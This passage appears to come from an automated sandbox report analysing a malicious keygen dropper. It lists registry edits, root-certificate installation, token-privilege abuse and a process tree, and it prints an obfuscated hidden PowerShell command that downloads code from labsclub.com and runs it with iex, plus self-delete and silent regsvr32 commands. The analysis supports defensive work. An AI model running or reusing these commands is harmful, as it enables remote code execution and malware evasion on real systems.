Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000ecb2d412fe35f35ffeb8a11c710ca8c9747dcf6b72e659526b77a89d8160234d35d1ee9f25fb87035609ba05b83a39755792348c6fc8da7c017288960c8f9fa008e4bde54de1116dd8f6b61c32c15d62666fe7d98c280ee6497e	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000009783e7d3ff2f298e4d8764d6686e21c58ff34ddd20b08ef75c96a910e28f319dc49f8f01b07ba0c002c4885d755654db005c7e7b6e1674c7728488bed965e8ebd03cb0f96844af62d88aed3ebea26fbcf6959ec30309c7c91ccb624c7e319f024dfbcaf4d3a92b35407ad7eac07490f68340b6613aa9baf5150b96f3841196dc377a91001ecc89116932e62788eb95122bfc8ce542164c1f94e3c5a3ab26a9695e5add25e8cbac69aa531a0c66276d15e06828380f7016a1d6f5640750917f71b03b24a603c860980e7eec147e4890553a266d1e14d7fed6e0e0661b6d70ecd89ebdbf44f4e1c001e35160bba56df2a062d5ccc85a6b1362b5447654a4e42f2bd78042a13e38a605096e1828dcb85eaebb14d878584c2346b2c106579b0d6176d12439a3afeb8bba167349a5134882e41e85c331199a49cee4f7903d570ca476184aedf3731c0287aa014fea593dc36f78c7957c267504471f86e76d0fffff166990a88699e9ce7a0cb9d3fb7bb720a1a679ac391ffd1588270ed4feb607db360497b0382b745a80ca39d59bb5d561a9693d22828c52514a6c4bc08a4f22e4f9a7944353d5bf	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{EA5CAD48-F911-4575-84F0-785BF856BBC4}"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "3yyqi0r"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
7404	PING.EXE
1292	PING.EXE
5796	PING.EXE

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	98	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	99	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	101	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3964	setups.tmp
3964	setups.tmp
2840	key.exe
2840	key.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe
4720	multitimer.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4576	MicrosoftEdgeCP.exe
4576	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2088	Setup.exe
Token: SeCreateTokenPrivilege	800	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	800	askinstall20.exe
Token: SeLockMemoryPrivilege	800	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	800	askinstall20.exe
Token: SeMachineAccountPrivilege	800	askinstall20.exe
Token: SeTcbPrivilege	800	askinstall20.exe
Token: SeSecurityPrivilege	800	askinstall20.exe
Token: SeTakeOwnershipPrivilege	800	askinstall20.exe
Token: SeLoadDriverPrivilege	800	askinstall20.exe
Token: SeSystemProfilePrivilege	800	askinstall20.exe
Token: SeSystemtimePrivilege	800	askinstall20.exe
Token: SeProfSingleProcessPrivilege	800	askinstall20.exe
Token: SeIncBasePriorityPrivilege	800	askinstall20.exe
Token: SeCreatePagefilePrivilege	800	askinstall20.exe
Token: SeCreatePermanentPrivilege	800	askinstall20.exe
Token: SeBackupPrivilege	800	askinstall20.exe
Token: SeRestorePrivilege	800	askinstall20.exe
Token: SeShutdownPrivilege	800	askinstall20.exe
Token: SeDebugPrivilege	800	askinstall20.exe
Token: SeAuditPrivilege	800	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	800	askinstall20.exe
Token: SeChangeNotifyPrivilege	800	askinstall20.exe
Token: SeRemoteShutdownPrivilege	800	askinstall20.exe
Token: SeUndockPrivilege	800	askinstall20.exe
Token: SeSyncAgentPrivilege	800	askinstall20.exe
Token: SeEnableDelegationPrivilege	800	askinstall20.exe
Token: SeManageVolumePrivilege	800	askinstall20.exe
Token: SeImpersonatePrivilege	800	askinstall20.exe
Token: SeCreateGlobalPrivilege	800	askinstall20.exe
Token: 31	800	askinstall20.exe
Token: 32	800	askinstall20.exe
Token: 33	800	askinstall20.exe
Token: 34	800	askinstall20.exe
Token: 35	800	askinstall20.exe
Token: SeDebugPrivilege	1204	multitimer.exe
Token: SeDebugPrivilege	4256	taskkill.exe
Token: SeDebugPrivilege	4176	MicrosoftEdge.exe
Token: SeDebugPrivilege	4176	MicrosoftEdge.exe
Token: SeDebugPrivilege	4176	MicrosoftEdge.exe
Token: SeDebugPrivilege	4176	MicrosoftEdge.exe
Token: SeDebugPrivilege	4720	multitimer.exe
Token: SeImpersonatePrivilege	2840	key.exe
Token: SeTcbPrivilege	2840	key.exe
Token: SeChangeNotifyPrivilege	2840	key.exe
Token: SeCreateTokenPrivilege	2840	key.exe
Token: SeBackupPrivilege	2840	key.exe
Token: SeRestorePrivilege	2840	key.exe
Token: SeIncreaseQuotaPrivilege	2840	key.exe
Token: SeAssignPrimaryTokenPrivilege	2840	key.exe
Token: SeManageVolumePrivilege	4820	md2_2efs.exe
Token: SeImpersonatePrivilege	2840	key.exe
Token: SeTcbPrivilege	2840	key.exe
Token: SeChangeNotifyPrivilege	2840	key.exe
Token: SeCreateTokenPrivilege	2840	key.exe
Token: SeBackupPrivilege	2840	key.exe
Token: SeRestorePrivilege	2840	key.exe
Token: SeIncreaseQuotaPrivilege	2840	key.exe
Token: SeAssignPrimaryTokenPrivilege	2840	key.exe
Token: SeDebugPrivilege	4768	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4768	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4768	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4768	MicrosoftEdgeCP.exe
Token: SeImpersonatePrivilege	2840	key.exe

Suspicious use of FindShellTrayWindow 39 IoCs

pid	Process
5372	Setup3310.tmp
5724	vjp2nptcneo.exe
5812	IBInstaller_97039.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5820	vpn.tmp
5432	rzd0ry3yrp5.tmp
5444	vict.tmp

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
3804	setups.exe
3964	setups.tmp
4176	MicrosoftEdge.exe
4576	MicrosoftEdgeCP.exe
4576	MicrosoftEdgeCP.exe
5268	Setup3310.exe
5292	vict.exe
5276	rzd0ry3yrp5.exe
5372	Setup3310.tmp
5392	132spuhvrqb.exe
5432	rzd0ry3yrp5.tmp
5444	vict.tmp
5588	IBInstaller_97039.exe
5604	vpn.exe
5812	IBInstaller_97039.tmp
5820	vpn.tmp
5928	mlhic33ojjr.exe
6096	app.exe
6120	chrome_proxy.exe
1484	winhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 896 wrote to memory of 2932	896	3d_Video_Player_4_5_serial_maker.exe	78
PID 896 wrote to memory of 2932	896	3d_Video_Player_4_5_serial_maker.exe	78
PID 896 wrote to memory of 2932	896	3d_Video_Player_4_5_serial_maker.exe	78
PID 2932 wrote to memory of 3860	2932	cmd.exe	81
PID 2932 wrote to memory of 3860	2932	cmd.exe	81
PID 2932 wrote to memory of 3860	2932	cmd.exe	81
PID 2932 wrote to memory of 1156	2932	cmd.exe	82
PID 2932 wrote to memory of 1156	2932	cmd.exe	82
PID 2932 wrote to memory of 1156	2932	cmd.exe	82
PID 2932 wrote to memory of 3000	2932	cmd.exe	83
PID 2932 wrote to memory of 3000	2932	cmd.exe	83
PID 2932 wrote to memory of 3000	2932	cmd.exe	83
PID 2932 wrote to memory of 3916	2932	cmd.exe	84
PID 2932 wrote to memory of 3916	2932	cmd.exe	84
PID 2932 wrote to memory of 3916	2932	cmd.exe	84
PID 3860 wrote to memory of 2840	3860	keygen-pr.exe	85
PID 3860 wrote to memory of 2840	3860	keygen-pr.exe	85
PID 3860 wrote to memory of 2840	3860	keygen-pr.exe	85
PID 3916 wrote to memory of 2088	3916	keygen-step-4.exe	86
PID 3916 wrote to memory of 2088	3916	keygen-step-4.exe	86
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 2840 wrote to memory of 3908	2840	key.exe	87
PID 3000 wrote to memory of 3788	3000	keygen-step-3.exe	88
PID 3000 wrote to memory of 3788	3000	keygen-step-3.exe	88
PID 3000 wrote to memory of 3788	3000	keygen-step-3.exe	88
PID 3788 wrote to memory of 1292	3788	cmd.exe	91
PID 3788 wrote to memory of 1292	3788	cmd.exe	91
PID 3788 wrote to memory of 1292	3788	cmd.exe	91
PID 2088 wrote to memory of 1204	2088	Setup.exe	92
PID 2088 wrote to memory of 1204	2088	Setup.exe	92
PID 2088 wrote to memory of 3804	2088	Setup.exe	94
PID 2088 wrote to memory of 3804	2088	Setup.exe	94
PID 2088 wrote to memory of 3804	2088	Setup.exe	94
PID 3916 wrote to memory of 800	3916	keygen-step-4.exe	95
PID 3916 wrote to memory of 800	3916	keygen-step-4.exe	95
PID 3916 wrote to memory of 800	3916	keygen-step-4.exe	95
PID 3804 wrote to memory of 3964	3804	setups.exe	96
PID 3804 wrote to memory of 3964	3804	setups.exe	96
PID 3804 wrote to memory of 3964	3804	setups.exe	96
PID 800 wrote to memory of 4164	800	askinstall20.exe	98
PID 800 wrote to memory of 4164	800	askinstall20.exe	98
PID 800 wrote to memory of 4164	800	askinstall20.exe	98
PID 4164 wrote to memory of 4256	4164	cmd.exe	101
PID 4164 wrote to memory of 4256	4164	cmd.exe	101
PID 4164 wrote to memory of 4256	4164	cmd.exe	101
PID 1204 wrote to memory of 4628	1204	Services.exe	222
PID 1204 wrote to memory of 4628	1204	Services.exe	222
PID 4628 wrote to memory of 4720	4628	parse.exe	106
PID 4628 wrote to memory of 4720	4628	parse.exe	106
PID 3916 wrote to memory of 4820	3916	keygen-step-4.exe	108
PID 3916 wrote to memory of 4820	3916	keygen-step-4.exe	108

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
7316	attrib.exe
8324	attrib.exe

C:\Users\Admin\AppData\Local\Temp\3d_Video_Player_4_5_serial_maker.exe
"C:\Users\Admin\AppData\Local\Temp\3d_Video_Player_4_5_serial_maker.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:896
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2932
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
    keygen-pr.exe -p83fsase3Ge
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3860
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2840
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
        5⤵
        Executes dropped EXE
        
        PID:3908
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
    keygen-step-1.exe
    3⤵
    - Executes dropped EXE
    PID:1156
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3000
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3788
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:1292
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3916
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2088
    - - C:\Users\Admin\AppData\Local\Temp\0HG0Y4PWP8\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0HG0Y4PWP8\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1204
      - C:\Users\Admin\AppData\Local\Temp\0HG0Y4PWP8\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0HG0Y4PWP8\multitimer.exe" 1 3.1616696297.605cd3e9a195a 101
        6⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\0HG0Y4PWP8\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0HG0Y4PWP8\multitimer.exe" 2 3.1616696297.605cd3e9a195a
        7⤵
        Executes dropped EXE
        Checks for any installed AV software in registry
        Maps connected drives based on registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4720
        
        C:\Users\Admin\AppData\Local\Temp\qpfdqcc4clh\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qpfdqcc4clh\vict.exe" /VERYSILENT /id=535
        8⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\is-9LVFR.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9LVFR.tmp\vict.tmp" /SL5="$201EC,870426,780800,C:\Users\Admin\AppData\Local\Temp\qpfdqcc4clh\vict.exe" /VERYSILENT /id=535
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\is-EDP32.tmp\winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EDP32.tmp\winhost.exe" 535
        10⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:1484
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\ditHSG6Sf.dll"
        11⤵
        
        PID:6960
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\ditHSG6Sf.dll"
        12⤵
        
        PID:4636
        
        C:\Windows\system32\regsvr32.exe
        
        /s "C:\Users\Admin\AppData\Local\Temp\ditHSG6Sf.dll"
        13⤵
        
        PID:2100
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\ditHSG6Sf.dllzGuOrBRSy.dll"
        11⤵
        
        PID:6924
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\ditHSG6Sf.dllzGuOrBRSy.dll"
        12⤵
        
        PID:3168
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        11⤵
        
        PID:7580
        
